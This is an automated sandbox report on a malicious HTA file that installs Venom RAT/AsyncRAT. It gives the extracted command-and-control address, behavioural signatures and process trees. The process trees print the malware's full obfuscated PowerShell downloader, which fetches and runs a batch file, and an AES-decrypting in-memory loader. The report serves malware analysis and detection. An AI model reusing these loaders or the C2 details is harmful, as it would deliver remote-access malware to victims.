Analysis
-
max time kernel
100s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
17-04-2024 01:20
Static task
static1
Behavioral task
behavioral1
Sample
44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta
Resource
win7-20240215-en
General
-
Target
44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta
-
Size
13KB
-
MD5
9f587ac1e364bc4b89ea9991c780b09a
-
SHA1
9612509e53fde418c7bb1794ac5f30c894b960a9
-
SHA256
44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384
-
SHA512
bcc6c0e3a765cc57fb2d75b5761175d3608befacb5d1b2d478d6e2ddcfa415b0afdf93299ecaff18c6d2de3b135f1ab6b2b2670f20668e3df73c2b679610feb3
-
SSDEEP
384:qpzWNjCBvB7owyK5GYsx5GlUi5GhmPM5GmmaUi5Gt48FR:scYZkYK0qmPM9mYl83
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
194.48.251.169:4449
wmdekgrrot
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/memory/3424-121-0x0000000007C10000-0x0000000007C28000-memory.dmp family_asyncrat -
Detects executables attemping to enumerate video devices using WMI 1 IoCs
resource yara_rule behavioral2/memory/3424-121-0x0000000007C10000-0x0000000007C28000-memory.dmp INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice -
Blocklisted process makes network request 3 IoCs
flow pid Process 28 4924 powershell.exe 31 4924 powershell.exe 42 3424 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2288054676-1871194608-3559553667-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1888 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 4924 powershell.exe 4924 powershell.exe 3424 powershell.exe 3424 powershell.exe 5024 powershell.exe 5024 powershell.exe 3424 powershell.exe 3424 powershell.exe 3424 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4924 powershell.exe Token: SeDebugPrivilege 3424 powershell.exe Token: SeDebugPrivilege 5024 powershell.exe -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 1888 EXCEL.EXE 3424 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 2784 wrote to memory of 4924 2784 mshta.exe 87 PID 2784 wrote to memory of 4924 2784 mshta.exe 87 PID 2784 wrote to memory of 4924 2784 mshta.exe 87 PID 4924 wrote to memory of 1888 4924 powershell.exe 92 PID 4924 wrote to memory of 1888 4924 powershell.exe 92 PID 4924 wrote to memory of 1888 4924 powershell.exe 92 PID 4924 wrote to memory of 4424 4924 powershell.exe 98 PID 4924 wrote to memory of 4424 4924 powershell.exe 98 PID 4924 wrote to memory of 4424 4924 powershell.exe 98 PID 4424 wrote to memory of 3964 4424 cmd.exe 100 PID 4424 wrote to memory of 3964 4424 cmd.exe 100 PID 4424 wrote to memory of 3964 4424 cmd.exe 100 PID 3964 wrote to memory of 4276 3964 cmd.exe 102 PID 3964 wrote to memory of 4276 3964 cmd.exe 102 PID 3964 wrote to memory of 4276 3964 cmd.exe 102 PID 3964 wrote to memory of 3424 3964 cmd.exe 103 PID 3964 wrote to memory of 3424 3964 cmd.exe 103 PID 3964 wrote to memory of 3424 3964 cmd.exe 103 PID 3424 wrote to memory of 5024 3424 powershell.exe 104 PID 3424 wrote to memory of 5024 3424 powershell.exe 104 PID 3424 wrote to memory of 5024 3424 powershell.exe 104
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\44e910d573342c0bd7713e853d6bffec6565db309e4e93042052f064b5626384.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function ekAviDgm($SBAMeJuWZ, $CZAXshoWnad){[IO.File]::WriteAllBytes($SBAMeJuWZ, $CZAXshoWnad)};function qHQDgYXJPBUhEu($SBAMeJuWZ){if($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42965,42973,42973))) -eq $True){rundll32.exe $SBAMeJuWZ }elseif($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42977,42980,42914))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $SBAMeJuWZ}elseif($SBAMeJuWZ.EndsWith((NPsijwhhOlDHomDMYu @(42911,42974,42980,42970))) -eq $True){misexec /qn /i $SBAMeJuWZ}else{Start-Process $SBAMeJuWZ}};function cCwKlxfFlkHXisv($cfRvnDevIseAZkkGCdZE){$ByCevDdKwarCKLMHmQl = New-Object (NPsijwhhOlDHomDMYu @(42943,42966,42981,42911,42952,42966,42963,42932,42973,42970,42966,42975,42981));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$CZAXshoWnad = $ByCevDdKwarCKLMHmQl.DownloadData($cfRvnDevIseAZkkGCdZE);return $CZAXshoWnad};function NPsijwhhOlDHomDMYu($ryHnSGx){$GVAeEuIntdcnz=42865;$kZTyiBcpN=$Null;foreach($YdUlriGuLkXxwHJSV in $ryHnSGx){$kZTyiBcpN+=[char]($YdUlriGuLkXxwHJSV-$GVAeEuIntdcnz)};return $kZTyiBcpN};function wtXSieyRAReJE(){$QeIsxXKSCag = $env:AppData + '\';$KPbdZNmFeRGIPHxzICPT = $QeIsxXKSCag + 'PurchaseDB.xlsx';If(Test-Path -Path $KPbdZNmFeRGIPHxzICPT){Invoke-Item $KPbdZNmFeRGIPHxzICPT;}Else{ $HXoxLKEOLYWMiHWXK = cCwKlxfFlkHXisv (NPsijwhhOlDHomDMYu @(42969,42981,42981,42977,42923,42912,42912,42914,42922,42917,42911,42917,42921,42911,42915,42918,42914,42911,42914,42919,42922,42923,42920,42915,42921,42920,42912,42945,42982,42979,42964,42969,42962,42980,42966,42933,42931,42911,42985,42973,42980,42985));ekAviDgm $KPbdZNmFeRGIPHxzICPT $HXoxLKEOLYWMiHWXK;Invoke-Item $KPbdZNmFeRGIPHxzICPT;};$GLzOZefB = $QeIsxXKSCag + 'gogis.bat'; if (Test-Path -Path $GLzOZefB){qHQDgYXJPBUhEu $GLzOZefB;}Else{ $PmRVpFoXv = cCwKlxfFlkHXisv (NPsijwhhOlDHomDMYu @(42969,42981,42981,42977,42923,42912,42912,42914,42922,42917,42911,42917,42921,42911,42915,42918,42914,42911,42914,42919,42922,42923,42920,42915,42921,42920,42912,42968,42976,42968,42970,42980,42911,42963,42962,42981));ekAviDgm $GLzOZefB $PmRVpFoXv;qHQDgYXJPBUhEu $GLzOZefB;};;;;}wtXSieyRAReJE;2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\PurchaseDB.xlsx"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1888
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"4⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "5⤵PID:4276
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5024
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50774a05ce5ee4c1af7097353c9296c62
SHA1658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
229B
MD578ed49954bb522710bac69df4bc869b6
SHA10f6250a3c8d4b43d7028ee5a17e1fddcfeb14ae8
SHA2568f36ec6bd88d6051bac74858bcd571f65de59aa3c6275c66ec67b337d381b326
SHA512dc3ae04c3627d672e4e41dfbcbf0d0fd45e8e7897c3b6340ca8ed3a460c91f994dce1531b9195a2093c12f1e295ca08b2786f2639323a56734853cdaf64b6213
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize872B
MD574c37c9ba17b5662296c0bbca2e9b4a1
SHA12ce04e0c12c9b183514e1e911f9a4d60802425eb
SHA256eca3729f34d9207c38a25a64a820f47d0d0672c0db43fe0d372e7fa66001dc32
SHA512332bb8db1e76aa1bfeb6fcd4de72ac5584baef93176eee54b1706cbc0426063bd134f251f73c9ac618d15f31c0ec557b22a94c9f343e919ec3b0aa53d018fcb8
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize24B
MD54fcb2a3ee025e4a10d21e1b154873fe2
SHA157658e2fa594b7d0b99d02e041d0f3418e58856b
SHA25690bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA5124e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff
-
Filesize
12KB
MD505eb4338ab9bcd275b88d8f2f701fea8
SHA1409e23bd1603cb69b7511a497483011005b9fdaf
SHA256b829611b9cb65f7baad3c897689d2c06cd457d294b072c48de79da471b986802
SHA5128f651aff4e2d6581913da2ab419213e71e1b88fa4cb7ab0853e5e0720308e4a4f86707d1aa1c457e3aed8046aba3647d7b8260472ddd6a34f7719f43a6855ced
-
Filesize
6.9MB
MD5a65e873839228c5b453d6effa5d14d16
SHA140be429e0e6b41061f3291d10e720eaebf32eda1
SHA25659c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951
SHA51284ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850